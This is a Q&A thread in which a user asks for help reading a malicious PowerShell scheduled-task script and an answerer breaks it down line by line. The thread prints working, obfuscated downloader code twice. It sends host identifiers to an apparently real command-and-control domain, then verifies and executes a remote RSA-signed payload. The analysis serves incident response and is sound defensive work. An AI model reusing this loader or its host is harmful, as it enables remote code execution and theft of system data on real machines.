# Powershell Scheduled tasks automatically being created and changing my DNS to 8.8.8.8 and 9.9.9.9

Tags: dns, powershell, virus

I have an issue with what I believe to be a virus.  It is creating PowerShell scripts in TaskScheduler.
It appears to be running WMIC and powershell.
It creates a task with the following code:

```
-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.pp6'+'r1.com';a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
```

It creates a randomly named file in the C:\Windows\System32\WindowsPowerShell\v1.0  (same size and creation date as powershell.exe).

I have blocked the website it is trying to get to, and I have deleted several WMIC 'autoruns' but it keeps changing the DNS entries to 8.8.8.8 and 9.9.9.9.

I am replacing the affected computer, but was wondering if anyone could assist in making the above readable so I might be able to check other machines in the network for traces.

Or if it reveals any information that might prove useful.

Thanks in advance.

Comment: Do you have professional antivirus support? Is this Exchange Server? You may need expert help. Maybe a HAFNIUM exploit.

Comment: No.  I do not have av support.

Comment: If this is a business, why not?

Comment: Not an exchange server .

Comment: Please check the edit I made. Correct formatting is very important. :-)

Comment: The script being ran most definitely is a virus.  You probably could figure out what process is creating the script by using Process Explorer or Process Monitor from Sysinternals (i.e. Microsoft)

Comment: So I tried downloading the (viral) payload but the site is down.

Answer (score 0):

The powershell script is straightforward. Contact website, download (encrypted) payload and execute payload (the Iex command).

It looks similar to [Trojan.Siggen12.57410](https://vms.drweb.com/virus/?lng=en&i=24098348)

As you can see, the script is just one of the many other things that may have been done.

Here's a quick rundown of the script

```
-c
```

Tells powershell to execute the following block of code

```
function a($u)
{
    $d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);
    $c=$d.count;
    if($c -gt 173) 
    {
        $b=$d[173..$c];
        $p=New-Object Security.Cryptography.RSAParameters;
        $p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');
        $p.Exponent=0x01,0x00,0x01;
        $r=New-Object Security.Cryptography.RSACryptoServiceProvider;
        $r.ImportParameters($p);
        if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171]))))
            {
                I`ex(-join[char[]]$b)
            }
    }
}
```

Creates a function called a that takes a URL u as parameter. From the URL it will download some data. If the data is big enough, ignore the lower part and decrypt the "payload". Check if the payload is good, then execute the payload (Iex command).

```
$url='http://'+'t.pp6'+'r1.com';
a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
```

This pieces a URL together based on some of your computer settings and calls the above defined function a with that URL.

Anyway, its likely alot more is going on than just the script you found. Check the URL i linked above, find an antivirus that will negate the threat to your standards or better yet wipe and reinstall. If the machines allow remote access, dont forget to check if any accounts were compromised.

Comment: Thank you.  I had found this url and blocked it on my Firewall when this first happened a few days ago.  So I am glad I found the right one.  I ran the MS Safety Scanner and found and removed "TrojanDropper:PowerShell/Injector.GS!MSR"